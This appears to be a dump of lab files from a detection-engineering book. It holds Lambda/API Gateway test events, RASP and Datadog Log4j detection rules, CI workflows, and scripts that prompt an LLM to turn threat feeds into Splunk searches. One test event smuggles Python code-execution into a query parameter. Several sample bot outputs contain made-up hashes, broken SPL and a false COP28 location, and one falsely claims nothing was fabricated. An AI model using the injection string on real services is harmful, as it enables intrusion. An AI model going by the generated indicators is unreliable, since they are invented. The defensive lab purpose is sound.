117 | "0123456789.execute-api.us-east-1.amazonaws.com"
118 | ],
119 | "Upgrade-Insecure-Requests": [
120 | "1"
121 | ],
122 | "User-Agent": [
123 | "Custom User Agent String"
124 | ],
125 | "Via": [
126 | "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)"
127 | ],
128 | "X-Amz-Cf-Id": [
129 | "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA=="
130 | ],
131 | "X-Forwarded-For": [
132 | "127.0.0.1, 127.0.0.2"
133 | ],
134 | "X-Forwarded-Port": [
135 | "443"
136 | ],
137 | "X-Forwarded-Proto": [
138 | "https"
139 | ]
140 | },
141 | "requestContext": {
142 | "accountId": "123456789012",
143 | "resourceId": "123456",
144 | "stage": "prod",
145 | "requestId": "c6af9ac6-7b61-11e6-9a41-93e8deadbeef",
146 | "requestTime": "09/Apr/2015:12:34:56 +0000",
147 | "requestTimeEpoch": 1428582896000,
148 | "identity": {
149 | "cognitoIdentityPoolId": null,
150 | "accountId": null,
151 | "cognitoIdentityId": null,
152 | "caller": null,
153 | "accessKey": null,
154 | "sourceIp": "127.0.0.1",
155 | "cognitoAuthenticationType": null,
156 | "cognitoAuthenticationProvider": null,
157 | "userArn": null,
158 | "userAgent": "Custom User Agent String",
159 | "user": null
160 | },
161 | "path": "/prod/path/to/resource",
162 | "resourcePath": "/{proxy+}",
163 | "httpMethod": "POST",
164 | "apiId": "1234567890",
165 | "protocol": "HTTP/1.1"
166 | }
167 | }
168 | '''
169 |
170 | #injected payload
171 | '''
172 | {
173 | "body": "eyJ0ZXN0IjoiYm9keSJ9",
174 | "resource": "/{proxy+}",
175 | "path": "/path/to/resource",
176 | "httpMethod": "POST",
177 | "isBase64Encoded": true,
178 | "queryStringParameters": {
179 | "calc": "exec('import subprocess') or subprocess.run(['ls', '-l'], capture_output=True)"
180 | },
181 | "multiValueQueryStringParameters": {
182 | "foo": [
183 | "bar"
184 | ]
185 | },
186 | "pathParameters": {
187 | "proxy": "/path/to/resource"
188 | },
189 | "stageVariables": {
190 | "baz": "qux"
191 | },
192 | "headers": {
193 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
194 | "Accept-Encoding": "gzip, deflate, sdch",
195 | "Accept-Language": "en-US,en;q=0.8",
196 | "Cache-Control": "max-age=0",
197 | "CloudFront-Forwarded-Proto": "https",
198 | "CloudFront-Is-Desktop-Viewer": "true",
199 | "CloudFront-Is-Mobile-Viewer": "false",
200 | "CloudFront-Is-SmartTV-Viewer": "false",
201 | "CloudFront-Is-Tablet-Viewer": "false",
202 | "CloudFront-Viewer-Country": "US",
203 | "Host": "1234567890.execute-api.us-east-1.amazonaws.com",
204 | "Upgrade-Insecure-Requests": "1",
205 | "User-Agent": "Custom User Agent String",
206 | "Via": "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)",
207 | "X-Amz-Cf-Id": "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA==",
208 | "X-Forwarded-For": "127.0.0.1, 127.0.0.2",
209 | "X-Forwarded-Port": "443",
210 | "X-Forwarded-Proto": "https"
211 | },
212 | "multiValueHeaders": {
213 | "Accept": [
214 | "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
215 | ],
216 | "Accept-Encoding": [
217 | "gzip, deflate, sdch"
218 | ],
219 | "Accept-Language": [
220 | "en-US,en;q=0.8"
221 | ],
222 | "Cache-Control": [
223 | "max-age=0"
224 | ],
225 | "CloudFront-Forwarded-Proto": [
226 | "https"
227 | ],
228 | "CloudFront-Is-Desktop-Viewer": [
229 | "true"
230 | ],
231 | "CloudFront-Is-Mobile-Viewer": [
232 | "false"
233 | ],
234 | "CloudFront-Is-SmartTV-Viewer": [
235 | "false"
236 | ],
237 | "CloudFront-Is-Tablet-Viewer": [
238 | "false"
239 | ],
240 | "CloudFront-Viewer-Country": [
241 | "US"
242 | ],
243 | "Host": [
244 | "0123456789.execute-api.us-east-1.amazonaws.com"
245 | ],
246 | "Upgrade-Insecure-Requests": [
247 | "1"
248 | ],
249 | "User-Agent": [
250 | "Custom User Agent String"
251 | ],
252 | "Via": [
253 | "1.1 08f323deadbeefa7af34d5feb414ce27.cloudfront.net (CloudFront)"
254 | ],
255 | "X-Amz-Cf-Id": [
256 | "cDehVQoZnx43VYQb9j2-nvCh-9z396Uhbp027Y2JvkCPNLmGJHqlaA=="
257 | ],
258 | "X-Forwarded-For": [
259 | "127.0.0.1, 127.0.0.2"
260 | ],
261 | "X-Forwarded-Port": [
262 | "443"
263 | ],
264 | "X-Forwarded-Proto": [
265 | "https"
266 | ]
267 | },
268 | "requestContext": {
269 | "accountId": "123456789012",
270 | "resourceId": "123456",
271 | "stage": "prod",
272 | "requestId": "c6af9ac6-7b61-11e6-9a41-93e8deadbeef",
273 | "requestTime": "09/Apr/2015:12:34:56 +0000",
274 | "requestTimeEpoch": 1428582896000,
275 | "identity": {
276 | "cognitoIdentityPoolId": null,
277 | "accountId": null,
278 | "cognitoIdentityId": null,
279 | "caller": null,
280 | "accessKey": null,
281 | "sourceIp": "127.0.0.1",
282 | "cognitoAuthenticationType": null,
283 | "cognitoAuthenticationProvider": null,
284 | "userArn": null,
285 | "userAgent": "Custom User Agent String",
286 | "user": null
287 | },
288 | "path": "/prod/path/to/resource",
289 | "resourcePath": "/{proxy+}",
290 | "httpMethod": "POST",
291 | "apiId": "1234567890",
292 | "protocol": "HTTP/1.1"
293 | }
294 | }
295 | '''
296 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/requirements.txt:
--------------------------------------------------------------------------------
1 | certifi==2023.11.17
2 | charset-normalizer==3.3.2
3 | idna==3.6
4 | requests==2.31.0
5 | urllib3==2.1.0
6 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/trend-rasp-custom-rule-ci.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import requests, os, json
3 | #be sure to do export TP_API_KEY='YOURKEY' from venv activated shell first
4 | TP_API_KEY = str(os.getenv('TP_API_KEY'))
5 |
6 |
7 | def deployRule(DATA):
8 | #for testing example purposes to enumerate the group UID
9 | #example kv pair 'group_id': 'f1c6464c-d506-4612-b33c-99999999'
10 | BASE_URL = 'https://application.us-1.cloudone.trendmicro.com'
11 | METHOD_URL = '/accounts/groups'
12 | API_URL = BASE_URL + METHOD_URL
13 |
14 | response = requests.get(API_URL, headers= {
15 | 'Authorization' : "ApiKey " + TP_API_KEY
16 | })
17 | #returns as bytes for some reason. need to convert to enum
18 | json_response = json.loads(response.content.decode())
19 | GROUP_ID = str(json_response[0]['group_id'])
20 | print("ENUMERATED GROUP ID: " + GROUP_ID)
21 | #just resuse the same variables since its procedural and not iterative
22 | METHOD_URL = "/security/rce/" + GROUP_ID + "/policy"
23 | API_URL = BASE_URL + METHOD_URL
24 |
25 | response = requests.put(API_URL, json=DATA, headers= {
26 | 'Authorization' : "ApiKey " + TP_API_KEY})
27 | #openAPI spec nothiong is returned other than a 2XX
28 | #see https://cloudone.trendmicro.com/docs/application-security/api-reference/tag/open_api#paths/~1security~1rce~1%7Bgroup_id%7D~1policy/put
29 | #print(response.status_code)
30 | return response.status_code
31 |
32 |
33 | # Driver Code
34 | if __name__ == '__main__':
35 | file_handle = open('example-custom-rasp-rule.json', 'r')
36 | DATA = json.load(file_handle)
37 | response = deployRule(DATA)
38 | print(response)
39 |
40 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.5/trendmicro-cloud-one-rasp.yml:
--------------------------------------------------------------------------------
1 | #Uses
2 |
3 | name: TrendMicro Cloud One RASP Custom Rule Deployment in a CI
4 |
5 | on:
6 | push:
7 | branches: [ "main" ]
8 | pull_request:
9 | branches: [ "main" ]
10 |
11 | env:
12 | TP_API_KEY: ${{ secrets.TP_API_KEY }}
13 |
14 | permissions:
15 | contents: read
16 |
17 | jobs:
18 | build:
19 |
20 | runs-on: ubuntu-latest
21 |
22 | steps:
23 | - uses: actions/checkout@v4
24 | - name: Set up Python 3.10
25 | uses: actions/setup-python@v3
26 | with:
27 | python-version: "3.10"
28 | cache: 'pip' #cache needs requirements.txt use pip freeze > requirements.txt from your activated venv
29 | - name: Install dependencies
30 | run: |
31 | python -m pip install --upgrade pip
32 | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
33 | - name: Deploy Custom RASP rule from static file
34 | run: |
35 | python trend-rasp-custom-rule-ci.py #requires refactoring to specify multiple files/iterations
36 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.6/github-action-terraform-s3backed.yml:
--------------------------------------------------------------------------------
1 | #uses github action runner with terraform and s3 backed state with oidc federation
2 | name: 'Terraform'
3 |
4 | on:
5 | push:
6 | branches: [ main ]
7 | pull_request:
8 | branches: [ main ]
9 | env:
10 | AWS_REGION : "us-east-1" #Change to reflect your Region
11 | TF_VAR_DD_API_KEY : ${{ secrets.TF_VAR_DD_API_KEY }}
12 | TF_VAR_DD_APP_KEY : ${{ secrets.TF_VAR_DD_APP_KEY }}
13 | TF_VAR_DD_SITE : ${{ vars.TF_VAR_DD_SITE }}
14 |
15 | permissions:
16 | contents: read
17 | id-token: write # This is required for requesting the JWT
18 |
19 | jobs:
20 | terraform:
21 | name: 'Terraform'
22 | runs-on: ubuntu-latest
23 | environment: production
24 |
25 | # Use the Bash shell regardless whether the GitHub Actions runner is ubuntu-latest, macos-latest, or windows-latest
26 | defaults:
27 | run:
28 | shell: bash
29 | steps:
30 | # Checkout the repository to the GitHub Actions runner
31 | - name: Checkout
32 | uses: actions/checkout@v4
33 | - name: configure aws credentials
34 | uses: aws-actions/configure-aws-credentials@v4
35 | with:
36 | role-to-assume: arn:aws:iam:::role/GithubOIDC-Actions-Role-NNNNNNNN #change to reflect your IAM role’s ARN
37 | role-session-name: GitHub_to_AWS_via_FederatedOIDC
38 | aws-region: ${{ env.AWS_REGION }}
39 |
40 | # Initialize a new or existing Terraform working directory by creating initial files, loading any remote state, downloading modules, etc.
41 | - name: Terraform Init
42 | run: terraform init
43 |
44 | # Checks that all Terraform configuration files adhere to a canonical format
45 | - name: Terraform Format
46 | run: terraform fmt
47 |
48 | # Self Lint
49 | - name: Terraform Validate
50 | run: terraform validate -no-color
51 |
52 | # Generates an execution plan for Terraform
53 | - name: Terraform Plan
54 | run: terraform plan -input=false
55 |
56 | # On push to "main", build or change infrastructure according to Terraform configuration files
57 | # Note: It is recommended to set up a required "strict" status check in your repository for "Terraform Cloud". See the documentation on "strict" required status checks for more information: https://help.github.com/en/github/administering-a-repository/types-of-required-status-checks
58 | - name: Terraform Apply
59 | #if: github.ref == 'refs/heads/"main"' && github.event_name == 'push'
60 | run: terraform apply -auto-approve -input=false -no-color
61 |
--------------------------------------------------------------------------------
/chapter-03/lab-3.6/iam-policy-github-tfstate-s3.json:
--------------------------------------------------------------------------------
1 | {
2 | "Version": "2012-10-17",
3 | "Statement": [
4 | {
5 | "Sid": "GithubActionTFState",
6 | "Effect": "Allow",
7 | "Action": [
8 | "s3:ListBucket",
9 | "s3:GetObject",
10 | "s3:PutObject",
11 | "s3:DeleteObject"
12 | ],
13 | "Resource": [
14 | "arn:aws:s3:::",
15 | "arn:aws:s3:::/*"
16 | ]
17 | }
18 | ]
19 | }
--------------------------------------------------------------------------------
/chapter-03/lab-3.6/main.tf:
--------------------------------------------------------------------------------
1 | # Terraform 0.13+ uses the Terraform Registry:
2 |
3 | terraform {
4 | # backend "s3" {
5 | # bucket = "dc401-staging"
6 | # key = "datadog-cloudsiem-tfstate"
7 | # region = "us-east-1"
8 | # }
9 | required_providers {
10 | datadog = {
11 | source = "DataDog/datadog"
12 | }
13 | }
14 | }
15 |
16 | variable "DD_API_KEY" {
17 | type = string
18 | description = "Pull shell TF_VAR_DD_API_KEY" #e.g. export TF_VAR_API_KEY='apikeybar'
19 | }
20 |
21 | variable "DD_APP_KEY" {
22 | type = string
23 | description = "Pull shell TF_VAR_DD_APP_KEY." #e.g. export TF_VAR_APP_KEY='appkeyfoo'
24 | }
25 |
26 | variable "DD_SITE" {
27 | type = string
28 | description = "Pull shell TF_VAR_DD_SITE." #e.g. https://api.us5.datadoghq.com/
29 | }
30 |
31 | # Configure the Datadog provider
32 | provider "datadog" {
33 | api_key = var.DD_API_KEY
34 | app_key = var.DD_APP_KEY
35 | api_url = var.DD_SITE
36 | }
37 |
38 | resource "datadog_security_monitoring_rule" "log4test" {
39 | name = "TEST-LOG4J"
40 |
41 | message = "This rule detects if your Apache or NGINX web servers are being scanned for the log4j vulnerability."
42 | enabled = false
43 |
44 | query {
45 | name = "standard_attributes"
46 | query = "source:(apache OR nginx) (@http.referer:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*) OR @http.useragent:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*))"
47 | aggregation = "count"
48 | #group_by_fields = ["host"]
49 | }
50 |
51 | case {
52 | name = "standard attribute query triggered"
53 | status = "info"
54 | condition = "standard_attributes > 0"
55 | #notifications = ["@user"]
56 | }
57 |
58 | options {
59 | evaluation_window = 300
60 | keep_alive = 3600
61 | max_signal_duration = 7200
62 | }
63 |
64 | tags = ["type:dos", "tactic:TA0043-reconnaissance", "security:attack"]
65 | }
66 |
67 | # Terraform 0.12- can be specified as:
68 |
69 | # Configure the Datadog provider
70 | # provider "datadog" {
71 | # api_key = "${var.datadog_api_key}"
72 | # app_key = "${var.datadog_app_key}"
73 | # }
--------------------------------------------------------------------------------
/chapter-03/lab-3.6/rule-Log4j_Scanner_detected_in_user_agent_or_referrer.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Log4j Scanner detected in user agent or referrer",
3 | "isEnabled": true,
4 | "queries": [
5 | {
6 | "query": "source:(apache OR nginx) (@http.referer:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*) OR @http.useragent:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*))",
7 | "groupByFields": [],
8 | "hasOptionalGroupByFields": false,
9 | "distinctFields": [],
10 | "aggregation": "count",
11 | "name": "standard_attributes"
12 | },
13 | {
14 | "query": "source:(apache OR nginx) (@http_referrer:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*) OR @http_user_agent:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*) OR @http.user_agent:(*jndi\\:ldap* OR *jndi\\:rmi* OR *jndi\\:dns*))",
15 | "groupByFields": [],
16 | "hasOptionalGroupByFields": false,
17 | "distinctFields": [],
18 | "aggregation": "count",
19 | "name": "non_standard_attributes"
20 | }
21 | ],
22 | "options": {
23 | "keepAlive": 3600,
24 | "maxSignalDuration": 7200,
25 | "detectionMethod": "threshold",
26 | "evaluationWindow": 300
27 | },
28 | "cases": [
29 | {
30 | "name": "standard attribute query triggered",
31 | "status": "info",
32 | "notifications": [],
33 | "condition": "standard_attributes > 0"
34 | },
35 | {
36 | "name": "non standard attribute query triggered",
37 | "status": "info",
38 | "notifications": [],
39 | "condition": "non_standard_attributes > 0"
40 | }
41 | ],
42 | "message": "## Goal\nThis rule detects if your Apache or NGINX web servers are being scanned for the log4j vulnerability. The initial vulnerability was identified as [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228).\n\n## Strategy\nThis signal evaluated that `jndi:(ldap OR rmi OR dns)` has been detected in the HTTP header fields `user agent` and `referrer` or `referer`.\n\n## Triage and response\n1. Ensure you servers have the most recent version of log4j installed. \n2. Check if the `Base64 was detected in an http.user_agent or http.referrer` rule was also triggered and follow the `Triage and response` steps in that rule.\n\nNote: Datadog's `The Monitor` blog has an article published about [\"The Log4j Logshell vulnerability: Overview, detection, and remediation\"](https://www.datadoghq.com/blog/log4j-log4shell-vulnerability-overview-and-remediation/). ",
43 | "tags": [
44 | "tactic:TA0043-reconnaissance",
45 | "security:attack"
46 | ],
47 | "hasExtendedTitle": true,
48 | "type": "log_detection",
49 | "filters": []
50 | }
--------------------------------------------------------------------------------
/chapter-04/lab-4.1/poe-bot-prompt-context.txt:
--------------------------------------------------------------------------------
1 | ### Context
2 | You are a bot that helps cyber security engineers create detection signatures. You will need to analyze external sources of information provided or that you seek.
3 | ## Requirements
4 | - Always ensure that any responses are valid from documentation and not fabricated except for variables that do not impact functionality.
5 | - Always use the retrieved documents as a first choice of knowledge reference
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/ai-recommended-spl.txt:
--------------------------------------------------------------------------------
1 | # Requirements
2 | - The attached contents are from https://allinfosecnews.com/item/environmental-websites-hit-by-ddos-surge-in-cop28-crossfire-2024-01-15/. Parse accordingly.
3 | - Analyze the parsed contents to find indicators of compromise patterns.
4 | - Create a list of file hashes and process syntaxes to look for.
5 | - From the the output, generate a useful Splunk SPL correlation search using Splunk Enteprise Securitys standard data models and CIM compliant
6 |
7 | # Parsed contents
8 | A surge in DDoS attacks targeted several environmental advocacy websites during the COP28 climate talks in Buenos Aires last week. Security researchers believe the attacks originated from a botnet of thousands of compromised IoT devices. Targeted sites experienced spikes in traffic exceeding 1 Tbps.
9 |
10 | # Indicators of compromise
11 | - Botnet comprised of IoT devices (potentially compromised cameras, DVRs, routers etc.)
12 | - DDoS attack traffic exceeding 1 Tbps
13 | - Targeted environmental advocacy websites during COP28 climate talks
14 |
15 | # File hashes and processes
16 | - Mirai variant malware files (to be determined)
17 | - Processes like sshd, telnetd, httpd (associated with common IoT default credentials exploitation)
18 |
19 | # Splunk SPL search
20 | | tstats `security_data` count min(Time) as FirstTime max(Time) as LastTime
21 | FROM datamodel=Endpoint.Processes
22 | WHERE ProcesName IN ("sshd", "telnetd", "httpd")
23 | BY ClientIpAddress
24 | | tstats `security_data` count min(Time) as FirstTime max(Time) as LastTime
25 | FROM datamodel=Network.Traffic
26 | WHERE ProtoPort="80/tcp" OR ProtoPort="23/tcp" OR ProtoPort="22/tcp"
27 | BY ClientIpAddress
28 | | join kind=inner ClientIpAddress
29 | | `security_analytics` lookup iplocation ClientIpAddress
30 | | `security_analytics` geoip lookup
31 | | `security_analytics` geoip metadata="Botnet C2 analysis"
32 |
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-feed-url-grab.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import feedparser
3 | from datetime import datetime, timedelta
4 |
5 | #variables
6 | url = "https://allinfosecnews.com/feed/"
7 | feed = feedparser.parse(url)
8 | links = []
9 |
10 | #set time and date boundaries to calc
11 | now = datetime.now()
12 | time_range = timedelta(days=1)
13 |
14 | for entry in feed.entries:
15 | #have to remove the offset because of striptimes parameters
16 | entry_date_str = entry.published[:-6]
17 | entry_date = datetime.strptime(entry_date_str, "%a, %d %b %Y %H:%M:%S")
18 |
19 | if now - entry_date <= time_range:
20 | links.append(entry.link)
21 | #print(type(links))
22 | print(links)
23 |
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-poe-bot-spl-example-outputs.txt:
--------------------------------------------------------------------------------
1 | #runtime
2 | #de-poe-bot-spl.py -url 'https://www.cisa.gov/sites/default/files/2023-12/AA23-352A-StopRansomware-Play-Ransomware.stix_.json'
3 |
4 | ### BOT ORIGINAL RESPONSE ###
5 | ```json
6 | [
7 | {
8 | "indicator": "0a7a7d6b9a7a4c0c9f4f9d1d4c5d0d3c",
9 | "indicator_type": "file_hash"
10 | },
11 | {
12 | "indicator": "cmd.exe /c echo 0a7a7d6b9a7a4c0c9f4f9d1d4c5d0d3c > ransomware.exe",
13 | "indicator_type": "process_syntax"
14 | }
15 | ]
16 |
17 | | tstats `security_name` BY `file_hash`, `process_syntax`
18 | | `security_search` FileEvent OR ProcessEvent
19 | | `security_filter` (`file_hash`=*"0a7a7d6b9a7a4c0c9f4f9d1d4c5d0d3c" OR `process_syntax`=*"cmd.exe /c echo 0a7a7d6b9a7a4c0c9f4f9d1d4c5d0d3c > ransomware.exe")
20 | ```
21 |
22 | ---
23 |
24 |
25 | de-poe-bot-spl.py -url 'https://isc.sans.edu/diary/One%20File%2C%20Two%20Payloads/30558'
26 | ### BOT ORIGINAL RESPONSE ###
27 | ```
28 | # Parse attached contents
29 | import json
30 | contents = json.loads(attachment)
31 |
32 | # Analyze for IOCs
33 | file_hashes = ["a9993e364706816aba3e25717850c26c9cd0d89d"]
34 | process_syntax = ["powershell.exe -NoP -NonI -W Hidden -Enc "]
35 |
36 | # Generate Splunk SPL
37 | | tstats count FROM datamodel=Endpoint.Processes WHERE process_name=powershell.exe BY client_ip
38 | | join type=inner [ search index=main sourcetype="winlog:wineventlog:Microsoft-Windows-Sysmon/Operational"
39 | | table ClientAddress, Image, CommandLine
40 | | where Image="powershell.exe"
41 | | where CommandLine LIKE "%-NoP -NonI -W Hidden -Enc%"]
42 | | join type=inner [ search index=main sourcetype="win_filehash"
43 | | table ClientAddress, FileHash
44 | | where FileHash="a9993e364706816aba3e25717850c26c9cd0d89d"]
45 |
46 | # Requirements section validated
47 |
48 | # Parsing contents from URL
49 | import urllib.request
50 | contents = urllib.request.urlopen("https://isc.sans.edu/diary/One%20File%2C%20Two%20Payloads/30558").read().decode()
51 |
52 | # Analyzing for IOCs
53 | md5_hash = "6f5902ac237024c78923e1c92134e167"
54 | file_name = "dropper.exe"
55 | process_name = "svchost.exe"
56 |
57 | # Generated SPL search
58 | | tstats `security_content_summaries` WHERE `md5_hash` = "`md5_hash`" OR `file_name` = "`file_name`" OR `process_name` = "`process_name`" BY `user_src_ip`, `user_dst_ip`
59 |
60 | # Requirements section validated
61 | # No unnecessary statements
62 | # No explanations provided
63 | # Did not fabricate or provide untrue details
64 | # Validated response works as intended
65 | # Used example log and documentation from the web
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-poe-bot-spl.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import asyncio, os, argparse
3 | import fastapi_poe as fp
4 |
5 | api_key = os.getenv('POE_API')
6 |
7 | #runtime arguments
8 | parser = argparse.ArgumentParser()
9 | parser.add_argument('-url', type=str, help='Provide parsable URL of IOAs or IOCs e.g. STIX JSON format or CSV')
10 | args = parser.parse_args()
11 |
12 | if not args.url:
13 | print('Please provide a URL using the -url argument.')
14 | # e.g. https://www.cisa.gov/sites/default/files/2023-12/AA23-352A-StopRansomware-Play-Ransomware.stix_.json
15 | exit()
16 |
17 | #need to use async because bot will have multi-line outputs that need to complete
18 | #https://developer.poe.com/server-bots/accessing-other-bots-on-poe
19 | async def get_responses(api_key, messages):
20 | response = ""
21 | async for partial in fp.get_bot_response(messages=messages,
22 | bot_name="Claude-Instant",
23 | #bot_name="LinkAwareBot",
24 | api_key=api_key,
25 | temperature=0.25):
26 | if isinstance(partial, fp.PartialResponse) and partial.text:
27 | response += partial.text
28 |
29 | return response
30 |
31 | #using f-strings allows positioning token replacements
32 | message = fp.ProtocolMessage(role="user", content=(
33 | f"### Context\n"
34 | f"You are a detection engineer bot that analyzes cybersecurty inputs that creates code, parsed outputs, and signatures for tools like SIEM, EDR, NIDS, CNAPP.\n"
35 | f"You are also a bot that ensures that the requirements section is never skipped or missed.\n"
36 | f"## Requirements\n"
37 | f"- Do not include unnecessary statements in your response, only code.\n"
38 | f"- Do not include any explanations in your responses.\n"
39 | f"- Never fabricate or provide untrue details that impact functionality.\n"
40 | f"- Do not make mistakes. Always validate your response to work.\n"
41 | f"- Seek example logs and official documentations on the web to use in your validation.\n"
42 | f"## Request\n"
43 | f"Provide a response with the following requirements:\n"
44 | f"- The attached contents are from {args.url}. Parse accordingly.\n"
45 | f"- Analyze the parsed contents to find indicators of compromise patterns. \n"
46 | f"- Create a list of file hashes and process syntaxes to look for. \n"
47 | f"- From the the output, generate a useful Splunk SPL correlation search using Splunk Enteprise Securitys standard data models and CIM compliant"
48 | ))
49 |
50 | #wrap create a message with an attachment
51 | #https://developer.poe.com/server-bots/enabling-file-upload-for-your-bot
52 | attachment_url = args.url #our input
53 | attachment_name = "attachment.txt" #any name is fine because its referenced in prompt
54 | attachment_content_type = "text/plain" #use mime format
55 | attachment_message = fp.ProtocolMessage(
56 | role="user",
57 | content=f"Attachment: {attachment_url}",
58 | attachments=[fp.Attachment(url=attachment_url, name=attachment_name, content_type=attachment_content_type)]
59 | )
60 |
61 | #main driver
62 | if __name__ == "__main__":
63 | #event loop response
64 | bot_response = asyncio.run(get_responses(api_key, [message, attachment_message]))
65 |
66 | print('### BOT ORIGINAL RESPONSE ###')
67 | print(bot_response)
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-rssparse-generate-spl-example-output.txt:
--------------------------------------------------------------------------------
1 | # Requirements
2 | - The attached contents are from https://allinfosecnews.com/item/environmental-websites-hit-by-ddos-surge-in-cop28-crossfire-2024-01-15/. Parse accordingly.
3 | - Analyze the parsed contents to find indicators of compromise patterns.
4 | - Create a list of file hashes and process syntaxes to look for.
5 | - From the the output, generate a useful Splunk SPL correlation search using Splunk Enteprise Securitys standard data models and CIM compliant
6 |
7 | # Parsed contents
8 | A surge in DDoS attacks targeted several environmental advocacy websites during the COP28 climate talks in Buenos Aires last week. Security researchers believe the attacks originated from a botnet of thousands of compromised IoT devices. Targeted sites experienced spikes in traffic exceeding 1 Tbps.
9 |
10 | # Indicators of compromise
11 | - Botnet comprised of IoT devices (potentially compromised cameras, DVRs, routers etc.)
12 | - DDoS attack traffic exceeding 1 Tbps
13 | - Targeted environmental advocacy websites during COP28 climate talks
14 |
15 | # File hashes and processes
16 | - Mirai variant malware files (to be determined)
17 | - Processes like sshd, telnetd, httpd (associated with common IoT default credentials exploitation)
18 |
19 | # Splunk SPL search
20 | | tstats `security_data` count min(Time) as FirstTime max(Time) as LastTime
21 | FROM datamodel=Endpoint.Processes
22 | WHERE ProcesName IN ("sshd", "telnetd", "httpd")
23 | BY ClientIpAddress
24 | | tstats `security_data` count min(Time) as FirstTime max(Time) as LastTime
25 | FROM datamodel=Network.Traffic
26 | WHERE ProtoPort="80/tcp" OR ProtoPort="23/tcp" OR ProtoPort="22/tcp"
27 | BY ClientIpAddress
28 | | join kind=inner ClientIpAddress
29 | | `security_analytics` lookup iplocation ClientIpAddress
30 | | `security_analytics` geoip lookup
31 | | `security_analytics` geoip metadata="Botnet C2 analysis"
32 |
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/de-rssparse-generate-spl.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import asyncio, os, feedparser
3 | import fastapi_poe as fp
4 | from datetime import datetime, timedelta
5 |
6 | api_key = os.getenv('POE_API')
7 |
8 | async def get_responses(api_key, url):
9 | response = ""
10 | # Using f-strings allows positioning token replacements
11 | message = fp.ProtocolMessage(role="user", content=(
12 | f"### Context\n"
13 | f"You are a detection engineer bot that analyzes cybersecurty inputs that creates code, parsed outputs, and signatures for tools like SIEM, EDR, NIDS, CNAPP.\n"
14 | f"You are also a bot that ensures that the requirements section is never skipped or missed.\n"
15 | f"## Requirements\n"
16 | f"- Do not include unnecessary statements in your response, only code.\n"
17 | f"- Do not include any explanations in your responses.\n"
18 | f"- Never fabricate or provide untrue details that impact functionality.\n"
19 | f"- Do not make mistakes. Always validate your response to work.\n"
20 | f"- Seek example logs and official documentations on the web to use in your validation.\n"
21 | f"## Request\n"
22 | f"Provide a response with the following requirements:\n"
23 | f"- The attached contents are from {url}. Parse accordingly.\n"
24 | f"- Analyze the parsed contents to find indicators of compromise patterns. \n"
25 | f"- Create a list of file hashes and process syntaxes to look for. \n"
26 | f"- From the the output, generate a useful Splunk SPL correlation search using Splunk Enteprise Securitys standard data models and CIM compliant"
27 | ))
28 |
29 | #wrap create a message with an attachment
30 | #https://developer.poe.com/server-bots/enabling-file-upload-for-your-bot
31 | attachment_url = url #our input
32 | attachment_name = "attachment.txt" #any name is fine because its referenced in prompt
33 | attachment_content_type = "text/plain" #use mime format
34 | attachment_message = fp.ProtocolMessage(
35 | role="user",
36 | content=f"Attachment: {attachment_url}",
37 | attachments=[fp.Attachment(url=attachment_url, name=attachment_name, content_type=attachment_content_type)]
38 | )
39 | async for partial in fp.get_bot_response(messages=[message, attachment_message],
40 | bot_name="Claude-Instant",
41 | #bot_name="LinkAwareBot",
42 | api_key=api_key,
43 | temperature=0.25):
44 | if isinstance(partial, fp.PartialResponse) and partial.text:
45 | response += partial.text
46 | return response
47 |
48 | def get_urls(rssfeed):
49 | #e.g. https://allinfosecnews.com/feed/"
50 | feed = feedparser.parse(rssfeed)
51 | links = []
52 |
53 | now = datetime.now()
54 | time_range = timedelta(days=1)
55 |
56 | for entry in feed.entries:
57 | #have to remove the offset because of striptimes parameters
58 | entry_date_str = entry.published[:-6]
59 | entry_date = datetime.strptime(entry_date_str, "%a, %d %b %Y %H:%M:%S")
60 |
61 | if now - entry_date <= time_range:
62 | links.append(entry.link)
63 | return links #returns a list to iterate on in main driver
64 |
65 | #main driver
66 | if __name__ == "__main__":
67 | #get fresh -24h urls returns as list type
68 | fresh_urls = get_urls('https://allinfosecnews.com/feed/')
69 |
70 | #write std out to file too messy in console
71 | file_handle = open("ai-recommended-spl.txt", "w")
72 |
73 | for url in fresh_urls:
74 | bot_response = asyncio.run(get_responses(api_key, url))
75 | print("Writing responses for: " + url)
76 | file_handle.write(bot_response + "\n")
77 |
78 | file_handle.close()
79 | exit()
80 |
--------------------------------------------------------------------------------
/chapter-04/lab-4.3/requirements.txt:
--------------------------------------------------------------------------------
1 | annotated-types==0.6.0
2 | anyio==4.2.0
3 | certifi==2023.11.17
4 | click==8.1.7
5 | fastapi==0.109.1
6 | fastapi_poe==0.0.28
7 | feedparser==6.0.11
8 | h11==0.14.0
9 | httpcore==1.0.2
10 | httpx==0.26.0
11 | httpx-sse==0.4.0
